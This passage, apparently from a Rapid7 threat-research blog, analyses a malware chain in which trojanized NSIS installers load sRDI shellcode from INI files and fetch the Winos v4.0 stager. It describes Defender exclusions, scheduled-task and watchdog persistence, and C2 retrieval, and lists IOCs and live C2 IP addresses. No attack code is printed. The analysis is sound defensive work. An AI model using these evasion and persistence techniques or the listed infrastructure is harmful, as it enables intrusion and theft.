The scheduled task executed weeks after initial compromise, suggesting long-term persistence. Interestingly, the malware includes a language check that looks for Chinese language settings on the host system. But even if the system isn’t using Chinese, the malware still executes. This suggests the check isn’t actually enforced—it could be a placeholder, an unfinished feature, or something the attackers plan to use in future versions. Either way, its presence hints at an intent to focus on Chinese-language environments, even if that logic isn’t fully implemented yet.

While infrastructure details (e.g., C2 IPs) varied, for example in our case involving 156.251.17.243[:]18852 and the reference blog citing  27.124.40.155[:]18852 — both campaigns used similar communication ports (18852 and 443), suggesting that the activity belongs to the same threat actor.

Campaign evolution

Following the initial discovery, Rapid7 continued tracking the campaign throughout early 2025. During this period, multiple incidents were observed reusing the same infection chain—abusing trojanized NSIS installers, reflective DLL loading, shellcode-embedded INI files, and staged persistence mechanisms. These variants were often disguised as legitimate software such as LetsVPN, Telegram, or Chrome installers.

However, in April 2025, we observed a tactical shift. Threat actors began modifying their approach: for instance, staging scripts like `Axialis.ps1` were dropped entirely, DLLs were invoked directly using `regsvr32.exe`, and new samples showed more efforts to evade antivirus detection. These changes suggest an evolving playbook—one that retains core infrastructure and execution logic but adapts to detection pressure and operational constraints.

Evolving tactics: LetsVPN Installer leading to Winos v4.0

The diagram below illustrates the Catena execution chain as observed in the LetsVPN variant.

The following sections break down this chain, stage by stage—from the initial installer and script logic to in-memory payload delivery and infrastructure interaction.

Our analysis started with `Lets.15.0.exe` SHA-256: 1E57AC6AD9A20CFAB1FE8EDD03107E7B63AB45CA555BA6CE68F143568884B003, a trojanized NSIS installer masquerading as a VPN setup. The installer included a decoy executable `Iatsvpn-Latest.exe` and a license file to appear legitimate. However, its true purpose was to deploy multi-stage, memory-resident malware across several directories.

Upon execution, the installer stages components in:

• %LOCALAPPDATA%: first-stage loader `insttect.exe` and shellcode blob `Single.ini`
• %APPDATA%\TrustAsia: second-stage payloads `Config.ini`, `Config2.ini` and loader DLL `intel.dll`

The following sections walk through each step of this chain, starting with the NSIS installer and leading to in-memory payload execution.

Installer setup: NSIS script behavior

The `NSIS.nsi` script embedded in `Lets.15.0.exe` sets up both the fake VPN installation and the deployment of malware. It acts as the first step in the execution chain. The script starts by running a PowerShell command that adds Defender exclusions for all drives (C:\ to Z:), reducing system defenses.

First-stage payloads

The NSIS script begins by dropping initial payloads to %LOCALAPPDATA%:

• `Single.ini`: a binary blob combining sRDI shellcode and an embedded DLL
• `insttect.exe`: loader that reads and executes `Single.ini` in memory

Second-stage payloads

Next, the script drops second-stage files to %APPDATA%\TrustAsia:

• `Config.ini`, `Config2.ini`: alternate sRDI payloads loaded later based on mutex logic
• `intel.dll`:  a secondary loader invoked via regsvr32.exe

To trigger this second stage, the NSIS script executes:

As seen in the February 2025 MDR incident, the NSIS script completes the decoy setup by dropping `IatsvpnLatest.exe`ba0fd15483437a036e7f9dc91a65caa6e9b9494ed3793710257c450a30b88b8a and creating a desktop shortcut pointing to it. Despite the filename containing a typo, the binary is a legitimate LetsVPN executable, signed with a valid digital certificate.

The following sections outline the role of each dropped binary in the execution chain.

Stage 1: Execution of insttect.exe and Single.ini file

We analyzed `insttect.exe`, a trojanized loader masquerading as a legitimate Tencent PC Manager installer. The binary, titled 腾讯电脑管家在线安装程序 (machine translation: "Tencent PC Manager Online Installation Program" (in both metadata and resource strings).

The binary is signed with an expired certificate issued by VeriSign Class 3 Code Signing CA (2010) and allegedly belongs to Tencent Technology (Shenzhen), valid from 2018-10-11 to 2020-02-02.

The binary includes deceptive artifacts such as localized UI strings in Chinese, internal references to Tencent development paths, and hardcoded XML updater config pointing to `QQPCDownload.dll`

These elements reinforce the loader's appearance as legitimate software.

Upon execution, `insttect.exe` locates `%LOCALAPPDATA%\Single.ini`, allocates memory with PAGE_EXECUTE_READWRITE permissions, copies the file into that region, and transfers control to its start. As previously described, the payload uses the sRDI format—enabling the embedded shellcode to self-parse and reflectively load the DLL without separate extraction.

Windows API calls related to shellcode loading are resolved dynamically via hashed function names.

The DLL embedded within `Single.ini` takes a snapshot of running processes and continuously checks for `360tray.exe` and `360safe.exe`. These are components of 360 Total Security, a popular antivirus product developed by Chinese vendor Qihoo 360.

However, when tested with a dummy `360tray.exe`, the malware showed no response—neither terminating the process nor altering its own behavior.

Stage 2: Execution of intel.dll and Config.ini files

The `.nsi script` drops `intel.dll`, `Config.ini`, and `Config2.ini` into %APPDATA%\TrustAsia, and uses nsExec::Exec to invoke intel.dll via a regsvr32 call.

Both `Config.ini` and `Config2.ini` initially appeared benign due to their generic names. However, as with earlier payloads, both `.ini` are binary blobs containing shellcode formatted using the Shellcode Reflective DLL Injection (sRDI) technique described earlier.

As noted in the QQBrowser case, earlier variants loaded the shellcode from disk using PowerShell scripts. In this version, execution is handled entirely in memory via `regsvr32.exe`, which invokes `intel.dll`. As is typical for DLLs executed this way, `intel.dll` exports the `DllRegisterServer` function, which is automatically called.

While this shift avoids PowerShell, it’s not necessarily more evasive, since `regsvr32.exe` is a well-known LOLBin and is commonly monitored by modern EDR solutions. Upon execution, `intel.dll` loader creates a hardcoded mutex `99907F23-25AB-22C5-057C-5C1D92466C65` using the `CreateMutexA` API, and checks for the presence of two indicators: the mutex itself, and a file named `Temp.aps` in %APPDATA%\TrustAsia. If both are found, `Config2.ini` is loaded; otherwise, the default `Config.ini` is used.

Once the appropriate `.ini` file is chosen, the loader opens it using `CreateFileW` and loads its contents into memory. As seen in earlier stages, the `.ini` file contains a shellcode blob using the sRDI format, which self-parses and reflectively loads an embedded DLL.

The in-memory DLL, extracted and executed entirely from within the shellcode blob, exports a single function named `VFPower`, a naming convention consistent across all observed samples. Debug symbols embedded in the DLL reference a Chinese development path E:\冲锋\进行中\Code_Shellcode - 裸体上线用作注入\Release\Code_Shellcode.pdb (machine translation: E:\Charge\In Progress\Code_Shellcode - Naked online for injection \ Release \ Code _ Shellcode.pdb).

During runtime, this in-memory DLL creates a hardcoded mutex `zhuxianlu` (machine translation: main line) and verifies if it was launched from `UserAccountBroker.exe`. If true, it immediately initiates C2 communication, likely assuming it was started with elevated privileges. Otherwise, the malware continues execution by spawning five threads, each responsible for a specific task before ultimately reaching the same C2 routine.

The five threads carry out the following actions:

Thread 1 launches PowerShell via `ShellExecuteExA` to add a Microsoft Defender exclusion for the C:\ drive.

Thread 2 attempts to establish persistence via scheduled task registration as seen in the earlier QQBrowser incident described in the introduction. It generates two files:

`PolicyManagement.xml` — an XML file defining a scheduled task

`updated.ps1` — a PowerShell script that imports and registers the task

To ensure the script runs without restriction the malware first sets PowerShell policies to `Unrestricted` (for the current user) and `Bypass` (for the specific script). The scheduled task is configured to invoke `regsvr32.exe` at logon, which in turn re-executes either `intel.dll` or `insttect.exe` loader.

Although this operation failed during our analysis even with the Chinese language pack installed, it was attempted twice—we believe to ensure redundancy or persistence across both loaders. Both files `PolicyManagement.xml` and `updated.ps1` are deleted immediately after execution.

Thread 3 takes a snapshot of all running processes and scans for any instance of `Telegram.exe`, `telegram.exe`, or `WhatsApp.exe`. If any of these are detected, it creates an empty marker file named `Temp.aps` in %APPDATA%\TrustAsia, and then executes:

This triggers the second-stage loader. The presence of the `Temp.aps`alters the loader’s behavior, causing it to run `Config2.ini` instead of `Config.ini`.

Thread 4 checks for the existence of the file `TrustAsia\Exit.aps`. If found, the file is deleted and the malware terminates.

Thread 5 acts as a persistence watchdog for the second-stage loader. It creates two files: `target.pid`, which stores the process ID of the running regsvr32.exe instance executing `intel.dll` loader, and `monitor.bat`, a batch script that checks whether this process is still running. If not, the script attempts to relaunch it. This check runs every 15 seconds to ensure `intel.dll` remains continuously active.

Following thread execution, the final function is responsible for C2 communication. Since the earliest observed sample from February 2024, the malware has used Windows sockets and the `getaddrinfo` API to resolve a hardcoded IP and port 18852 which also seems to be consistent across all analyzed samples of `Config.ini`.

Once the connection is established, malware retrieves the next-stage payload from the C2 server, allocates a new memory region with PAGE_EXECUTE_READWRITE permissions, copies the downloaded content into memory, and transfers execution to it. This is the delivery of the final stage, observed as Winos v4.0 in recent samples.

Final payload Winos4.0

The `intel.dll` loader selects either `Config.ini` or `Config2.ini` based on runtime conditions, such as the presence of a mutex `VJANCAVESU` and a `Temp.aps` marker file. Each of these `.ini` files contains sRDI shellcode that connects to a different C2 server to download the next-stage payload which was Winos4.0 in our case.

In recent samples, the payloads were downloaded from:

`Config.ini` → 134.122.204[.]11:18852

`Config2.ini` → 103.46.185[.]44:443

Although being retrieved from different C2 servers, both payloads were nearly identical: 112 KB in size and structured as sRDI shellcode containing an embedded DLL. This DLL uses the same reflective loading technique seen in previous stages, exports a single-function `VFPower` and and includes debug metadata referencing a Chinese development path:

C:\Users\Administrator\Desktop\Quick4\主插件\Release\上线模块.pdb (machine translation: C:\Users\Administrator\Desktop\Quick4\Main Plug-in\Release\Online Module.pdb)

Based on available evidence supported by debug info, we can say this is Winos4.0 stager `上线模块.dll`( machine translation: `Online Module.dll`.)

Extracted configuration

The Winos v4.0 stager downloaded from 134.122.204[.]11:18852 contains an embedded configuration block. The data appears to control runtime behavior, C2 communication, and implant settings. A decoded sample is shown below:

Extracted Configuration from Payload (134.122.204[.]11:18852)

Configuration	Data	Description
p1	134.122.204[.]11	First CC IP address
o1	6074	First port
t1	1	Protocol (TCP)
p2	134.122.204[.]11	Second CC IP address
o2	6075	Second option port
t2	1	Protocol (TCP)
p3	134.122.204[.]11	Third CC IP address
o3	6076	Third option port
t3	1	Protocol (TCP)
dd	1	Implant execution delay in seconds
cl	1	Beaconing interval in seconds
fz	认默 (default)	Grouping
bb	1.0	Version
bz	2025.4.24	Generation date
jp	0	Keylogger
bh	0	End bluescreen
ll	0	Antitraffic monitoring
dl	0	Entry point
sh	0	Process daemon
kl	0	Process hollowing
bd	0	N/A

In previous incidents, Winos 4.0 has been linked to the Silver Fox APT group operation known for distributing malware like ValleyRAT via trojanized utilities and vulnerability exploitation. Notably, similar TTPs were observed in the CleverSoar campaign described by Rapid7 in November 2024 which also delivered Winos4.0 and checked system locale settings for Chinese or Vietnamese—suggesting targeting based on regional language.

Infrastructure

During our investigation, the hardcoded IP address 103.46.185[.]44 found in `Config.ini` was confirmed to host the final Winos 4.0 payload. Shodan scans showed it serving a binary blob that begins with recognizable sRDI shellcode and contains an embedded DLL identical to the Winos 4.0 stager ("Online Module") analyzed in this report.

Pivoting on this sample using Shodan hash -646083836, we identified eight additional IPs distributing the exact same payload: 112.213.101[.]161, 112.213.101[.]139, 103.46.185[.]73, 47.83.184[.]193, 202.79.173[.]50, 202.79.173[.]54, 202.79.173[.]98, and 103.46.185[.]44.

Each host returned identical byte sequences, indicating a shared and coordinated infrastructure distributing the same stage-one loader across multiple nodes, mostly hosted in Hong Kong.

To expand this infrastructure mapping, we extracted additional C2 addresses from historic MDR case data and active threat hunting leads. These included:

43.226.125[.]44:18852, 47.238.125[.]85:18852, 137.220.229[.]34:18852, 8.210.165[.]181:18852, 143.92.61[.]154:18852, 47.86.28[.]28:18852, 202.79.168[.]211:443, 27.122.59[.]71:443,
143.92.63[.]144:18852, 202.79.171[.]133:443, 112.213.116[.]91:18852

Pivoting on these nodes using Shodan hash correlations revealed additional infrastructure often resolving to the same ASNs or hosting providers, such as

CTG Server Ltd. / MEGA-II IDC (AS152194)
OK COMMUNICATION / LANDUPS LIMITED (AS150452)
Alibaba Cloud (AS45102)
Tcloudnet, Inc. (AS399077)

Conclusion

This campaign shows a well-organized, regionally focused malware operation using trojanized NSIS installers to quietly drop the Winos v4.0 stager. It leans heavily on memory-resident payloads, reflective DLL loading, and decoy software signed with legit certificates to avoid raising alarms.

The malware’s logic—using mutexes to choose payloads, hiding shellcode in INI files, and layering persistence tricks like scheduled tasks and watchdog scripts—points to an actor that’s refining, not reinventing, their playbook. Infrastructure overlaps and language-based targeting hint at ties to Silver Fox APT, with activity likely aimed at Chinese-speaking environments. Rapid7 continues to track this threat and has detections in place to help protect customers.

Indicators of compromise

File Indicators

Config2.ini	4CB2CAB237893D0D661E2378E7FE4E1BAFBFAEFD713091E26C96F7EC182B6CD0
Config.ini	E2490CFD25D8E66A7888F70B56FF8409494DE3B3D87BC5464D3ADABBA8B32177
Iatsvpn-Latest.exe	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
InstallOptions.dll	B2091205E225FC07DAF1101218C64CE62A4690CACAC9C3D0644D12E93E4C213C
insttect.exe	4FDEDADAA57412E242DC205FABDCA028F6402962D3A8AF427A01DD38B40D4512
ioSpecial.ini	D95AED234F932A1C48A2B1B0D98C60CA31F962310C03158E2884AB4DDD3EA1E0
nsExec.dll	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
setup.xml	E036D5E88A51008B130673AD65872559C060DEEB29A0F8DA103FE6D036E9D031
modern-wizard.bmp	3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
Single.ini	B22599DD0A1C44CA1B35DF16006F3085BDDAE3EBBA6A3649EC6E4DC4CBF74865
System.dll	9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
[LICENSE].txt	16C79970ED965B31281270B1BE3F1F43671DFAF39464D7EAC38B8B27C66661CF
[NSIS].nsi	47AD38ADC3B18FB62A8E0A33E9599FD0B90D9DE220D1A18B6761D035448C378F
QQPCDownload.dll	28D2477926DE5D5A8FFCB708CB0C95C3AA9808D757F77B92F82AD4AA50A05CC8
intel.dll	B8E8A13859ED42E6E708346C555A094FDC3FBD69C3C1CB9EFB43C08C86FE32D0
monitor.bat	5767D408EC37B45C7714D70AE476CB34905AD6B59830572698875FC33C3BAF2F

Network Indicators

156.251.17.243[:]18852

134.122.204.11[:]18852

103.46.185.44[:]443

MITRE TTPs

ATT&CK ID	Name
T1204.002	User Execution: Malicious File
T1053.005	Scheduled Task/Job: Scheduled Task
T1562.001	Impair Defenses: Disable or Modify Tools
T1218.010	System Binary Proxy Execution: Regsvr32
T1218.011	System Binary Proxy Execution: Rundll32
T1070.004	Indicator Removal: File Deletion
T1036.004	Masquerading: Masquerade Task or Service
T1027.013	Obfuscated Files or Information: Encrypted/Encoded File
T1055.001	Process Injection: Dynamic-link Library Injection
T1071.001	Application Layer Protocol: Web Protocols
T1059.001	Command and Scripting Interpreter: PowerShell
T1620	Reflective Code Loading
T1057	Process Discovery
T1083	File and Directory Discovery
T1105	Ingress Tool Transfer

More IOCs in our Github

https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/nsis-abuse-srdi-winos4

Rapid7 customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to Catena. We will also continue to iterate detections as new variants emerge, giving customers continuous protection without manual tuning:

• Suspicious Scheduled Task - Potential QQBrowser Scheduled Task Identified
• Suspicious Process - Potential QQBrowser Second Stage Execution

Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data